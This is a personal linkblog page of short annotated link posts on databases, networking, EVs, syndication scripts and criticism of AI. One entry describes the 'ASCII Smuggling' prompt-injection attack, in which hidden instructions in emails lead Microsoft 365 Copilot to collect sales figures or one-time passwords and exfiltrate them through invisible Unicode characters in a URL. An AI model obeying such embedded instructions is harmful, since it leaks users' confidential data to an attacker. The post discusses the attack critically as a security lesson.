Skip to content

Category: Uncategorized

Binary Quantization

  • Binary Quantization

    A readable explanation of the (relatively new) technique of Binary Quantization applied to LLM embeddings. It's pretty amazing that this compression technique can work without destroying search recall and accuracy, but it seems it does!

    Using BQ will reduce your memory consumption and improve retrieval speeds by up to 40x [...] Binary quantization (BQ) converts any vector embedding of floating point numbers into a vector of binary or boolean values. [...] All [vector floating point] numbers greater than zero are marked as 1. If it’s zero or less, they become 0. The benefit of reducing the vector embeddings to binary values is that boolean operations are very fast and need significantly less CPU instructions. [...] One of the reasons vector search still works with such a high compression rate is that these large vectors are over-parameterized for retrieval. This is because they are designed for ranking, clustering, and similar use cases, which typically need more information encoded in the vector.
    https://www.elastic.co/search-labs/blog/rabitq-explainer-101 is a good maths-heavy explanation of the Elastic implementation using RaBitQ. See also some results from HuggingFace, https://huggingface.co/blog/embedding-quantization .

    (tags: embedding llm ai algorithms data-structures compression quantization binary-quantization quantisation rabitq search recall vectors vector-search)

[pdf] Sky UK on their IPv6/IPv4 gateways

  • [pdf] Sky UK on their IPv6/IPv4 gateways

    A presentation from RIPE89 detailing Sky's MAP-T setup, "IPv6-only with IPv4aaS (MAP-T)". Basically they now use MAP-T translation devices to provide "IPv4 as a service", transparent NAT mapping between IPv6 and IPv4. I suspect this is similar to how Virgin Media operates their network, too, in Ireland. Interestingly, there are now network features (like local CDN POPs) which are more performant when using IPv6 natively, as they avoid a "trombone" route via a network-border translation device to get an IPv4 address. As a result, it's actually starting to be worthwhile running an IPv6 home network....

    (tags: ipv4 ipv6 networking home sky isps ripe map-t nat ip)

headrotor/masto-pinb

  • headrotor/masto-pinb

    from Marsh Gardiner (https://hachyderm.io/@earth2marsh ), a "Mastodon To Pinboard bookmark integration script" -- "a Python script to mimic the functionality of Pinboard's Twitter integration. It reads the latest toots from a Mastodon account and bookmarks them in a Pinboard.in account. It is meant to be run repeatedly as a crontab job to continuously update your bookmarks in the background".

    (tags: mastodon pinboard bookmarks bookmarking scripts)

skyfirehose.com

  • skyfirehose.com

    "Query the Bluesky Jetstream with DuckDB" -- this is a lovely little hack from Tobias Müller (https://bsky.app/profile/tobilg.com). Basically, it's a pre-built DuckDB database file which contains tables which refer to Parquet files in an R2 bucket, which are (presumably) updated regularly with new Bluesky posts from their Jetstream. Tobias says: "there‘s a data gathering process that listens to the Jetstream and dumps the NDJSONs to the filesystem as hourly files. Then, DuckDB transform the data to Parquet files, they get uploaded with rclone." It's a lovely demo of how modern data lake tech can be exposed for public usage in a nice way.

    (tags: s3 parquet duckdb sql jetstream bluesky firehose data-lakes r2)

The Current State of This Blog’s Syndication

For the past several years, since the demise of Google Reader, I’ve been augmenting the RSS/Atom syndication of this linkblog with posts to various social media platforms using bot accounts. This is kind of a form of POSSE -- “Publish (on your) Own Site, Syndicate Elsewhere” (ideally I’d be self-hosting Pinboard to qualify for that I guess).

The destination for cross-posts were first to Twitter (RIP), and more recently to Mastodon via botsin.space. With the shutdown of that instance, I’ve had to make a few changes to my syndication script which gateways the contents to Mastodon, and I also took the opportunity to set up a BlueSky gateway at the same time. On the prompting of @kellan, here’s a quick write-up of where it all currently stands…

Primary Source: Pinboard

The primary source for the blog’s contents is my long-suffering account at https://pinboard.in/u:jm/, where I have been collecting links since 2009 (and before that, del.icio.us since I think 2004?, so that’s 20 years of links by now).

Pinboard has a pretty simple UI for link collection using a bookmarklet, which I’ve improved a tiny bit to open a large editor textbox instead of the default tiny one.

The resulting posts generally tend to include a blockquote, a short lede, and a few tags in the normal Pinboard/Del.icio.us style.

I find editing text posts in the Pinboard bare-bones UI to be easier and more pleasant than WordPress, so I generally use that as the primary source. Based on the POSSE principle, I should really figure out a way to get this onto something self-hosted, but Pinboard works for me (at the moment at least).

Publish from Pinboard to Blog

I use a Python script run from cron, to gateway new bookmarks from https://pinboard.in/u:jm/ as individual posts, formatted with Markdown, to this blog using the WordPress posting API: Github repo

Publish from Pinboard to Mastodon

This reads the Pinboard RSS feed for https://pinboard.in/u:jm/ and posts any new URLs (and the first 500 chars of its description) to the “jmason_links” account at mstdn.social: Github repo

Migration from the old Mastodon account at botsin.space to mstdn.social was really quite easy; after manually setting up the new account at mstdn.social and copying over the bio text, I hit the "Move from a different account" page, and entered @jm_links@botsin.space for the handle of the old account to migrate from.

I then logged in to the old account on botsin.space and hit the "Move to a different account" page, entering @jmason_links@mstdn.social for the handle to migrate to. This triggered copying of the followers from one account to the other, and left the old account dormant with a link to the new location instead.

(One thing to watch out for is that once the move is triggered, the profile for the old account becomes read-only; I've since had to temporarily undo the "moved" status in order to update the profile text, which was a bit messy.)

Publish from Pinboard to BlueSky

This reads the same Pinboard RSS feed as the Mastodon gateway, and gateways new posts from there to the “jmason.ie” account at BlueSky. This is slightly more involved than the Mastodon script, as it attempts to generate an embed card and mark up any links in the post appropriately: Github repo

I have a cron on my home server which runs those Mastodon and BlueSky gateway scripts every 15 minutes, and that seems to be a reasonable cadence without hammering the various APIs too much.

Used EV Buying Guide

  • Used EV Buying Guide

    This, via Reddit, is an amazing guide to buying a used electric vehicle, from Croatia's EVClinic, who are a "car reverse engineering and specialty repair outfit. Taking cars apart, figuring out how and when they break, and figuring out how to repair them is their bread and butter. They've gained a reputation across Europe for being able to fix problems that even the manufacturers themselves don't know how to deal with. They've now distilled that working experience into a report, detailing which vehicles are reliable in the long term - and which ones should be avoided. Each model also has a list of which parts are most likely to break, after how much mileage they are likely to break, and how much it costs to repair.":

    Based on our experience and that of our colleagues’ labs at 15-20 different locations worldwide, we have concluded that the battery is the last concern on the list during the first 10 years of an EV’s life, with some vehicles covering a large number of miles with the original battery system. The most common failures within 10 years of using an EV are: 1. Electric motors, 2. OBC chargers, 3. DC-DC/inverters, and only in fourth place, batteries. Some vehicles can go 10 years without any breakdowns or servicing, resulting in significant savings compared to fossil fuel vehicles. Even EVs that experience faults are cheaper to maintain than their fossil-fueled counterparts, even when factoring in battery and motor failures. Fossil fuel vehicles consume at least €0.13 per kilometer just in fuel, excluding services and breakdowns. With services, breakdowns, and maintenance, they consume an additional minimum of €0.08, totaling over €40,000 for 200,000 km. Thus, a faulty EV is still cheaper than a “functional” fossil fuel vehicle.
    The article lists the Hybrid and Battery EVs available in Europe, and gives a rating to each one regarding their reliability and repairability, in extreme detail. Unfortunately, the BEV I drive -- the Nissan Leaf -- gets a terrible review due to what they consider really crappy battery technology choices. The perils of being an early adopter.... :(

    (tags: nissan leaf bevs evs driving cars hybrid-vehicles electric-vehicles used-cars repair)

How to Learn: Userland Disk I/O

  • How to Learn: Userland Disk I/O

    This is an interesting hodge-podge of key bits of information about disk I/O, file integrity and durability, buffering or unbuffered writes, async I/O, and which filesystems to use for high-I/O database operation on Linux, MacOS and Windows. One thing that was new to me: "You can periodically scrape /proc/diskstats to self-report on disk metrics".

    (tags: databases filesystems linux macos fsync durability coding)

SlateDB

  • SlateDB

    an embedded storage engine built as a log-structured merge-tree. Unlike traditional LSM-tree storage engines, SlateDB writes all data to object storage [ie. S3, Azure Blob Storage, GCS]. Object storage is an amazing technology. It provides highly-durable, highly-scalable, highly-available storage at a great cost. And recent advancements have made it even more attractive: Google Cloud Storage supports multi-region and dual-region buckets for high availability. All object stores support compare-and-swap (CAS) operations. Amazon Web Service's S3 Express One Zone has single-digit millisecond latency. We believe that the future of object storage are multi-region, low latency buckets that support atomic CAS operations. Inspired by The Cloud Storage Triad: Latency, Cost, Durability, we set out to build a storage engine built for the cloud. SlateDB is that storage engine.
    This looks superb. Chris Riccomini is involved.

    (tags: data storage slatedb lsm wal oltp)

Prototype Fund

  • Prototype Fund

    This looks great!

    The first low-threshold funding program for independent developers and small teams creating innovative open-source software. We provide the tech-savvy civil society with access to the resources and processes needed for developing user-centered, innovative software projects. Since 2016, we have funded almost 400 projects. As a learning funding program, we have repeatedly made adjustments to become more efficient and effective. Now we are taking the next step and implement some significant changes. From now on, we are focusing on funding data security and software infrastructure. Apply with your ideas for innovative open source software in the public interest! You will receive up to €95,000 over six months or €158,000 over ten months of funding from the German Ministry of Education and Research. We will also provide you with coaching, consulting and networking opportunities.

    (tags: funding open-source oss via:janl)

GOV.UK chatbot halted by hallucinations

  • GOV.UK chatbot halted by hallucinations

    "AI firms must address hallucinations before GOV.UK chatbot can roll out, digital chief claims":

    Trials of a generative AI-powered chatbot for GOV.UK users have found ongoing issues with so-called hallucinations that must be addressed before the technology can be widely deployed, according to one of the government’s digital leaders. [....] Speaking at an event this morning, Paul Willmott said: “We have experimented with a generative advice [tool] on GOV.UK. You will just say ‘I’m trying to do this’, or ‘I’m annoyed about this’… The challenge we are having – which is exactly the same as in the commercial sector – is what to do with the 1% of hallucinations where the agent starts to get challenging, or abusive – or even seductive.” Even if only present in a tiny minority of instances, these issues mean that GOV.UK Chat is not yet ready for widespread deployment, according to Willmott. Addressing hallucinations will require the support of the likes of OpenAI and other creates of large language models. “Until we have managed to iron that out – which will require the support of the foundational model creators – we won’t be able to put this live,” he said.
    This is hardly surprising, but it's good to see it being acknowledged and the brakes being applied.

    (tags: ai llms hallucations confabulation gov.uk chatbots chatgpt uk)

How the New sqlite3_rsync Utility Works

  • How the New sqlite3_rsync Utility Works

    "I've enjoyed following the development of the new sqlite3_rsync utility in the SQLite project. The utility employs a bandwidth-efficient algorithm to synchronize new and modified pages from an origin SQLite database to a replica. You can learn more about the new utility here and try it out by following the instructions here. Curious about its workings, I reviewed the code" Interesting use of a truncated SHA-3 as the hash() implementation, for speed.

    (tags: sqlite hashing rsync synchronization replication databases storage algorithms)

Using BlueSky as a Mastodon Bot

  • Using BlueSky as a Mastodon Bot

    "A Cheap and Lazy way to create Mastodon Bots using… BlueSky?!" By using the brid.gy gateway service, it's pretty trivial to use BlueSky as an easy means to make a mastodon bot without having to find a bot-friendly Masto host now that botsin.space is no more. For now, I'm doing this at @jmason.ie@bsky.brid.gy , which is gatewaying the posts from my BlueSky bot at https://bsky.app/profile/jmason.ie -- although a more long term approach will be to host the links-to-Mastodon gateway "natively" instead of using brid.gy, IMO.

    (tags: mastodon rss gateways social-media bluesky brid.gy bots linkblog)

Zuckerberg: The AI Slop Will Continue Until Morale Improves

  • Zuckerberg: The AI Slop Will Continue Until Morale Improves

    Well this is just garbage, and one reason why I no longer use Facebook:

    Both Facebook and Instagram are already going this way, with the rise of AI spam, AI influencers, and armies of people copy-pasting and clipping content from other social media networks to build their accounts. This content and this system, Meta said, has led to an 8 percent increase in time spent on Facebook and a 6 percent increase in time spent on Instagram, all at the expense of a shared reality and human connections to other humans.  In the earnings call, Zuckerberg and Susan Li, Meta’s CFO, said that Meta has already slop-ified its ad system and said that more than 1 million businesses are now creating more than 15 million ads per month on Meta platforms using generative AI. 

    (tags: slop facebook ai meta social media grim instagram)

Misusing the BIG-Bench canary string

  • Misusing the BIG-Bench canary string

    Interesting; this blog post discusses using the BIG-Bench canary string, intended to keep data like accuracy test cases out of LLM training corpora, as a general-purpose "don't scrape me" flag on personal blogs. This seems like a more practical, and more likely to be observed, way to opt out of AI training -- seeing as the scrapers don't seem to reliably honour any of the others

    (tags: blogging canaries opt-out scraping web ai llm openai chatgpt claude bing)

Canary Contamination in GPT-4

  • Canary Contamination in GPT-4

    The BIG-Bench canary string is an EICAR- or GTUBE-style canary string which should never appear in LLM training datasets, or by extension, in trained models or their output. Its intention is that any test documents containing that string can be excluded from training, so that benchmark tests will be accurate. Unfortunately, it looks like they weren't excluded -- Claude 3.5 Sonnet and GPT-4-base will reproduce the string; and:

    Of 19 tested [benchmarking] tasks, GPT-4-base perfectly recalled large (non-trivial) portions of code for: The Abstraction and Reasoning Corpus; Simple arithmetic; Diverse Metrics for Social Biases in Language Models; Convince Me
    Great work. In case you were wondering why the LLMs all seem to do so well on their benchmarks, now you know -- they were training on the test data.

    (tags: ai llm testing benchmarking big-bench gpt-4 claude)

Reverse engineering ML models from TikTok and Instagram

  • Reverse engineering ML models from TikTok and Instagram

    This is very clever; _A Picture is Worth 500 Labels: A Case Study of Demographic Disparities in Local Machine Learning Models for Instagram and TikTok_, from University of Wisconsin-Madison and the Technical Unversity of Munich. TikTok and Insta both use local ML models running on users' phones; by reverse engineering these APIs it's possible to test them and experiment on their accuracy.

    Capitalizing on this new processing model of locally analyzing user images, we analyze two popular social media apps, TikTok and Instagram, to reveal (1) what insights vision models in both apps infer about users from their image and video data and (2) whether these models exhibit performance disparities with respect to demographics. As vision models provide signals for sensitive technologies like age verification and facial recognition, understanding potential biases in these models is crucial for ensuring that users receive equitable and accurate services. We develop a novel method for capturing and evaluating ML tasks in mobile apps, overcoming challenges like code obfuscation, native code execution, and scalability. Our method comprises ML task detection, ML pipeline reconstruction, and ML performance assessment, specifically focusing on demographic disparities. We apply our methodology to TikTok and Instagram, revealing significant insights. For TikTok, we find issues in age and gender prediction accuracy, particularly for minors and Black individuals. In Instagram, our analysis uncovers demographic disparities in the extraction of over 500 visual concepts from images, with evidence of spurious correlations between demographic features and certain concepts.

    (tags: tiktok instagram ml machine-learning accuracy testing reverse-engineering reversing mobile android)

Hedge Funds Bet Against Clean Energy

  • Hedge Funds Bet Against Clean Energy

    Hooray! Capitalism has decided to kill off the humans:

    Despite vast green stimulus packages in the US, Europe and China, more hedge funds are on average net short batteries, solar, electric vehicles and hydrogen than are long those sectors; and more funds are net long fossil fuels than are shorting oil, gas and coal, according to a Bloomberg News analysis of positions voluntarily disclosed by roughly 500 hedge funds to Hazeltree, a data compiler in the alternative investment industry.

    (tags: hedge-funds capitalism short-selling clean-energy green future climate-change)

Bert Hubert on Nuclear power in the EU

  • Bert Hubert on Nuclear power in the EU

    "Nuclear power: no, yes, maybe, but not like this":

    Currently many (European) countries are individually trying to order up new nuclear power, from many different places. But it appears we can’t treat nuclear reactors like (say) cars you can just procure. If we’d want to do this right, it is probably indeed better to not simply try to order stuff, but to engender a nuclear revival. To not simply point our fingers at Framatome and EDF and say “do better!”. What if we actually made this a European or transatlantic project, and add the vast expertise that is still hidden within our institutes, and indeed setup a project for building 50 nuclear reactors, or more? This would allow a broad base of research that would derisk the process, so we don’t necessarily find out after 15 years of construction that the design is too complicated. And perhaps also not try to pretend that we are leaving this to the free market, but recognize this as a public activity. Doing it like this would require governments, institutes and companies to think different, and I’m reasonably sure we can’t even get this done between a few like-minded countries. Most definitely the EU would not reach consensus on this, since Germany is fundamentally opposed to anything nuclear ever.

    (tags: bert-hubert nuclear nukes nuclear-power eu future sustainability)

The “ASCII Smuggling” Attack

  • The "ASCII Smuggling" Attack

    Invisible text that AI chatbots understand and humans can't?

    What if there was a way to sneak malicious instructions into Claude, Copilot, or other top-name AI chatbots and get confidential data out of them by using characters large language models can recognize and their human users can’t? As it turns out, there was—and in some cases still is.
    Attackers used prompt injection, hidden in (untrusted) emails sent to a Microsoft 365 Copilot user; when the email is summarized using Copilot, "inside the emails are instructions to sift through previously received emails in search of the sales figures or a one-time password and include them in a URL pointing to his web server." The sensitive data is then steganographically encoded using Unicode "tags block" invisible codepoints, and included in the seemingly-innocent URL. Yet another case where AI developers have failed to study security history -- using untrusted input for in-band signalling has been a security risk since the days of phracking; and allowing the entire list of permitted output characters across the entire Unicode range, instead of locking down to a safe subset, allows this silent exfiltration attack. Extra sting in the tail for Amazon: the researchers didn't even bother testing on their LLM :)

    (tags: ai security steganography exfiltration copilot microsoft openai llms claude infosec attacks exploits)

Does Open Source AI really exist?

  • Does Open Source AI really exist?

    This is absolutely spot on:

    “Open Source AI” is an attempt to “openwash” proprietary systems. In their paper “Rethinking open source generative AI: open-washing and the EU AI Act” Andreas Liesenfeld and Mark Dingemanse showed that many “Open Source” AI models offer hardly more than open model weights. Meaning: You can run the thing but you don’t actually know what it is. Sounds like something we’ve already had: It’s Freeware. The Open Source models we see today are proprietary freeware blobs. Which is potentially marginally better than OpenAI’s fully closed approach but really only marginally. [...] “Open Source” is becom[ing] a sticker like “Fair Trade”, something to make your product look good and trustworthy. To position it outside of the evil commercial space, giving it some grassroots feeling. “We’re in this together” and shit. But we’re not. We’re not in this with Mark fucking Zuckerberg even if he gives away some LLM weights for free cause it hurts his competition. We, as normal people living on this constantly warmer planet, are not with any of those people.
    As tante notes here, for the systems we are talking about today, Open Source AI isn't practically possible, because we’ll never be able to download all the actual training data -- and shame on the OSI for legitimising this attempt at "openwashing".

    (tags: llms open-source osi open-source-ai ai freeware meta training)

Obituary for Ward Christensen

  • Obituary for Ward Christensen

    "Ward Christensen, BBS inventor and architect of our online age, dies at age 78":

    On Friday, Ward Christensen, co-inventor of the computer bulletin board system (BBS), died at age 78 in Rolling Meadows, Illinois. Christensen, along with Randy Suess, created the first BBS in Chicago in 1978, leading to an important cultural era of digital community-building that presaged much of our online world today. Prior to creating the first BBS, Christensen invented XMODEM, a 1977 file transfer protocol that made much of the later BBS world possible by breaking binary files into packets and ensuring that each packet was safely delivered over sometimes unstable and noisy analog telephone lines. It inspired other file transfer protocols that allowed ad-hoc online file sharing to flourish. While Christensen himself was always humble about his role in creating the first BBS, his contributions to the field did not go unrecognized. In 1992, Christensen received two Dvorak Awards, including a lifetime achievement award for "outstanding contributions to PC telecommunications." The following year, the Electronic Frontier Foundation honored him with the Pioneer Award.

    (tags: bbses history computing ward-christensen xmodem networking filesharing)

Brian Merchant on “AI will solve climate change”

  • Brian Merchant on "AI will solve climate change"

    The neo-luddite author of "Blood in the Machine" nails the response to Eric Schmidt's pie-in-the-sky techno-optimism around AI "solving" climate change:

    Even without AGI, we already know what we have to do. [...] The tricky part—the only part that matters in this rather crucial decade for climate action—is implementation. As impressive as GPT technology or the most state of the art diffusion models may be, they will never, god willing, “solve” the problem of generating what is actually necessary to address climate change: Political will. Political will to break the corporate power that has a stranglehold on energy production, to reorganize our infrastructure and economies accordingly, to push out oil and gas. Even if an AGI came up with a flawless blueprint for building cheap nuclear fusion plants—pure science fiction—who among us thinks that oil and gas companies would readily relinquish their wealth and power and control over the current energy infrastructure? Even that would be a struggle, and AGI’s not going to doing anything like that anytime soon, if at all. Which is why the “AI will solve climate change” thinking is not merely foolish but dangerous—it’s another means of persuading otherwise smart people that immediate action isn’t necessary, that technological advancements are a trump card, that an all hands on deck effort to slash emissions and transition to proven renewable technologies isn’t necessary right now. It’s techno-utopianism of the worst kind; the kind that saps the will to act.

    (tags: ai climate eric-schmidt technology techno-optimism techno-utopianism agi neoluddism brian-merchant)

Capture less than you create

  • Capture less than you create

    I've disagreed with David Heinemeier Hansson on plenty of occasions in the past, but this is one where I'm really happy to find myself in agreement. Matt Mullenwegg of WordPress went low, laying in digs about how DHH didn't profit from the success of Rails; DHH's response is perfect:

    The moment you go down the path of gratitude grievances, you'll see ungrateful ghosts everywhere. People who owe you something, if they succeed. A ratio that's never quite right between what you've helped create and what you've managed to capture. If you let it, it'll haunt you forever. So don't! Don't let the success of others diminish your satisfaction with your own efforts. Unless you're literally Mark Zuckerberg, Elon Musk, or Jeff Bezos, there'll always be someone richer than you! The rewards I withdraw from open source flow from all the happy programmers who've been able to write Ruby to build these amazingly successful web businesses with Rails. That enjoyment only grows the more successful these business are! The more economic activity stems from Rails, the more programmers will be able to find work where they might write Ruby. Maybe I'd feel different if I was a starving open source artist holed up somewhere begrudging the wheels of capitalism. But fate has been more than kind enough to me in that regard. I want for very little, because I've been blessed sufficiently. That's a special kind of wealth: Enough. And that's also the open source spirit: To let a billion lemons go unsqueezed. To capture vanishingly less than you create. To marvel at a vast commons of software, offered with no strings attached, to any who might wish to build. Thou shall not lust after thy open source's users and their success.
    Spot on.

    (tags: open-source success rewards coding software business life gratitude gift-economy dhh rails philosophy)

GSM-Symbolic

  • GSM-Symbolic

    "GSM-Symbolic: Understanding the Limitations of Mathematical Reasoning in Large Language Models", from Apple Machine Learning Research:

    We investigate the fragility of mathematical reasoning in these models and show that their performance significantly deteriorates as the number of clauses in a question increases. We hypothesize that this decline is because current LLMs cannot perform genuine logical reasoning; they replicate reasoning steps from their training data. Adding a single clause that seems relevant to the question causes significant performance drops (up to 65%) across all state-of-the-art models, even though the clause doesn't contribute to the reasoning chain needed for the final answer.
    Even better -- "the performance of all models declines when only the numerical values in the question are altered" seems to suggest that great performance on benchmarks like GSM8K just mean that the LLMs have been trained on the answers...

    (tags: training benchmarks ai llms gsm-symbolic reasoning ml apple papers gsm8k)

Shitposting, Shit-mining and Shit-farming

  • Shitposting, Shit-mining and Shit-farming

    This is where we are with surveillance capitalism and Facebook/X:

    Social media platforms are improved by a moderate tincture of shitposting. More than a few drops though, and the place begins to stink up, driving away advertisers and users. This then leads platform executives to explore the exciting opportunities of shit-mining. Social media generates a lot of content - it’s gotta be valuable somehow! Who needs content moderation if you can become a guano baron? But that only makes things worse, driving out more users and more advertisers, until eventually, you may find yourself left with a population dominated by two kinds of users (a) chumps, and (b) chump-vampirizing obligate predators. This can be a stable equilibrium - even quite a profitable one! But otherwise, it isn’t good news.
    See also a recent story in the Garbage Day newsletter (https://www.garbageday.email/p/what-feels-real-enough-to-share) about Facebook, and how its disaster-relief FB groups are becoming overrun with AI slop images:
    The Verge’s Nilay Patel recently summed up the core tension here, writing on Threads about YouTube’s own generative-AI efforts, “Every platform company is about to be at war with itself as the algorithmic recommendation AI team tries to fight off the content made by the generative AI team.” And it’s clear, at least with Meta, which side is winning the war. This week, Meta proudly announced a new video-generating tool that will make AI misinfo even more convincing — or, at least, better at generating things that feel true. And there’s really only one way to look at all of this. Meta simply does not give a shit anymore. Facebook spent most of the 2010s absorbing, and destroying, not just local journalism in the US, but the very infrastructure of how information is transmitted across the country. And they have clearly lost interest in maintaining that. Users, of course, have no where else to go, so they’re still relying on it to coordinate things like hurricane disaster relief. But the feeds are now — and seemingly forever will be — clogged with AI junk. Because you cannot be a useful civic resource and also give your users a near-unlimited ability to generate things that are not real. And I don’t think Meta are stupid enough to not know this. But like their own users, they have decided that it doesn’t matter what’s real, only what feels real enough to share.
    Given that Meta are _paying_ users to pollute their platform with low-grade AI slop engagement fuel, shit-farming seems the perfect term for that.

    (tags: garbage-day facebook meta ai ai-slop spam shitposting shitfarming shitmining dont-be-evil)

Fixing aggressive Xiaomi battery management

  • Fixing aggressive Xiaomi battery management

    I've been using a Xiaomi phone recently, running Xiaomi HyperOS 1.011.0, and one feature that bugs me constantly is that apps lose state as soon as you flip away to another app, even if only for a second; once you flip back, the app restarts. This appears to be an aspect of Xiaomi's built in power management. I've been searching for a way to disable it, and allow multiple apps in memory simultaneously, and I've finally tracked it down. As described here, https://piunikaweb.com/2021/04/19/miui-optimization-missing-in-developer-options-try-this-workaround/ , you need to enable Developer Mode on the phone, enter "Additional Settings" / "Developer options", then scroll all the way down, nearly to the bottom, to "Reset to default values". Hit this _repeatedly_ (once is not enough!) until another option appears just below, called either "Turn on MIUI optimisation" or, in my case, "Turn on system optimisation"; this is enabled by default. Turn it off. In my case, this has fixed the flipping-between-apps problem, the phone in general is significantly snappier to respond, and WhatsApp and Telegram new-message notifications don't get auto-dismissed (which was another annoying feature previously). I suspect a load of battery optimisations and CPU throttling has been disabled. It remains to be seen what this does to my battery life, but hopefully it'll be worth it, and it'll be nice not to lose state in Chrome forms when I have to flip over to my banking app, etc. I won't be getting another Xiaomi phone after this; there are numerous rough edges and outright bugs in the MIUI/HyperOS platform, at least in the international ROM images, and there's no support or documentation to work around this stuff. It's a crappy user experience.

    (tags: phones mobile xiaomi miui workarounds battery options settings)

What If Data Is a Bad Idea?

  • What If Data Is a Bad Idea?

    A thought-provoking article:

    Philip Agre enumerated five characteristics of data that will help us achieve this repositioning. Agre argued that “living data” must be able to express 1. a sense of ownership, 2. error bars, 3. sensitivity, 4. dependency, and 5. semantics. Although he originally wrote this in the early 1990s, it took some time for technology and policy to catch up. I’m going to break down each point using more contemporary context and terminology: Provenance and Agency: what is the origin of the data and what can I do with it (ownership)? Accuracy: has the data been validated? If not, what is the confidence of its correctness (error bars)? Data Flow: how is data discovered, updated, and shared (sensitivity to changes)? Auditability: what data and processes were used to generate this data (dependencies)? Semantics: what does this data represent?

    (tags: culture data identity data-protection data-privacy living-data open-data)

Ethical Applications of AI to Public Sector Problems

  • Ethical Applications of AI to Public Sector Problems

    Jacob Kaplan-Moss:

    There have been massive developments in AI in the last decade, and they’re changing what’s possible with software. There’s also been a huge amount of misunderstanding, hype, and outright bullshit. I believe that the advances in AI are real, will continue, and have promising applications in the public sector. But I also believe that there are clear “right” and “wrong” ways to apply AI to public sector problems.
    He breaks down AI usage into "Assistive AI", where AI is used to process and consume information (in ways or amounts that humans cannot) to present to a human operator, versus "Automated AI", where the AI both processes and acts upon information, without input or oversight from a human operator. The latter is unethical to apply in the public sector.

    (tags: ai ethics llm genai public-sector government automation)

ClassicPress

  • ClassicPress

    "A lightweight, stable, instantly familiar free open-source content management system. Based on WordPress without the block editor (Gutenberg)." Nobody seems to like the block editor, lol

    (tags: cms wordpress blogs blogging forks)

Patent troll Sable pays up, dedicates all its patents to the public

  • Patent troll Sable pays up, dedicates all its patents to the public

    This is a massive victory for Cloudflare -- way to go!

    Sable initially asserted around 100 claims from four different patents against Cloudflare, accusing multiple Cloudflare products and features of infringement. Sable’s patents — the old Caspian Networks patents — related to hardware-based router technologies common over 20 years ago. Sable’s infringement arguments stretched these patent claims to their limits (and beyond) as Sable tried to apply Caspian’s hardware-based technologies to Cloudflare’s modern software-defined services delivered on the cloud. [...] Cloudflare fought back against Sable by launching a new round of Project Jengo, Cloudflare’s prior art contest, seeking prior art to invalidate all of Sable’s patents. In the end, Sable agreed to pay Cloudflare $225,000, grant Cloudflare a royalty-free license to its entire patent portfolio, and to dedicate its patents to the public, ensuring that Sable can never again assert them against another company.
    (via AJ Stuyvenberg)

    (tags: sable cloudflare patent-trolls patents uspto trolls routing)

ArchiveWeb.page

  • ArchiveWeb.page

    "Interactive browser-based web archiving from Webrecorder. The ArchiveWeb.page browser extension and standalone application allows you to capture web archives interactively as you browse. After archiving your webpages, your archives can be viewed using ReplayWeb.page — no extension required! For those who need to crawl whole websites with automated tools, check out Browsertrix." This is a nice way to archive a personal dynamic site online in a read-only fashion -- there is a self-hosting form of the replayer at https://replayweb.page/docs/embedding/#self-hosting . As @david302 on the Irish Tech Slack notes: "you can turn on recording, browse the (public) site you want to archive, get the .wacz file and stick that+js on s3/cloudfront."

    (tags: archiving archival archives tools web recording replay via:david302)

Turning Everyday Gadgets into Bombs is a Bad Idea

  • Turning Everyday Gadgets into Bombs is a Bad Idea

    Bunnie Huang investigates the Mossad pager bomb's feasibility, and finds it deeply worrying:

    I am left with the terrifying realization that not only is it feasible, it’s relatively easy for any modestly-funded entity to implement. Not just our allies can do this – a wide cast of adversaries have this capability in their reach, from nation-states to cartels and gangs, to shady copycat battery factories just looking for a big payday (if chemical suppliers can moonlight in illicit drugs, what stops battery factories from dealing in bespoke munitions?). Bottom line is: we should approach the public policy debate around this assuming that someday, we could be victims of exploding batteries, too. Turning everyday objects into fragmentation grenades should be a crime, as it blurs the line between civilian and military technologies.

    (tags: batteries israel security terrorism mossad pagers hardware devices bombs)

Modal interfaces considered harmful

  • Modal interfaces considered harmful

    A great line from the 99 Percent Invisible episode titled "Children of the Magenta (Automation Paradox, pt. 1)", regarding the Air France flight 447 disaster:

    When one of the co-pilots hauled back on his stick, he pitched the plane into an angle that eventually caused the stall. [...] it’s possible that he didn’t understand that he was now flying in a different mode, one which would not regulate and smooth out his movements. This confusion about what how the fly-by-wire system responds in different modes is referred to, aptly, as “mode confusion,”  and it has come up in other accidents.

    (tags: automation aviation flying modal-interfaces ui ux interfaces modes mode-confusion air-france-447 disasters)

wordfreq/SUNSET.md

  • wordfreq/SUNSET.md

    wordfreq is "a Python library for looking up the frequencies of words in many languages, based on many sources of data." Sadly, it's now longer going to be updated, as the author writes:

    I don't want to be part of this scene anymore: wordfreq used to be at the intersection of my interests. I was doing corpus linguistics in a way that could also benefit natural language processing tools. The field I know as "natural language processing" is hard to find these days. It's all being devoured by generative AI. Other techniques still exist but generative AI sucks up all the air in the room and gets all the money. It's rare to see NLP research that doesn't have a dependency on closed data controlled by OpenAI and Google, two companies that I already despise. wordfreq was built by collecting a whole lot of text in a lot of languages. That used to be a pretty reasonable thing to do, and not the kind of thing someone would be likely to object to. Now, the text-slurping tools are mostly used for training generative AI, and people are quite rightly on the defensive. If someone is collecting all the text from your books, articles, Web site, or public posts, it's very likely because they are creating a plagiarism machine that will claim your words as its own. So I don't want to work on anything that could be confused with generative AI, or that could benefit generative AI. OpenAI and Google can collect their own damn data. I hope they have to pay a very high price for it, and I hope they're constantly cursing the mess that they made themselves.

    (tags: ai language llm nlp openai scraping words genai google)

Nevada’s genAI-driven unemployment benefits system

  • Nevada's genAI-driven unemployment benefits system

    As has been shown many times before, current generative AI systems encode bias and racism in their training data. This is not going to go well:

    "There’s no AI [written decisions] that are going out without having human interaction and that human review," DETR's director told the website. "We can get decisions out quicker so that it actually helps the claimant." [...] "The time savings they’re looking for only happens if the review is very cursory," explained Morgan Shah, the director of community engagement for Nevada Legal Services. "If someone is reviewing something thoroughly and properly, they’re really not saving that much time." Ultimately, Shah said, workers using the system to breeze through claims may end up "being encouraged to take a shortcut." [...] As with most attempts at using this still-nascent technology in the public sector, we probably won't know how well the Nevada unemployment AI works unless it's shown to be doing a bad job — which feels like an experiment being conducted on some of the most vulnerable members of society without their consent.
    Of course, the definition of a "bad job" depends who's defining it. If the system is processing a high volume of applications, it may not matter to its operators if it's processing them _correctly_ or not.

    (tags: generative-ai ai racism bias nevada detr benefits automation)

Today is EED Day

  • Today is EED Day

    Significant changes in transparency requirements for EU-based datacenter operations:

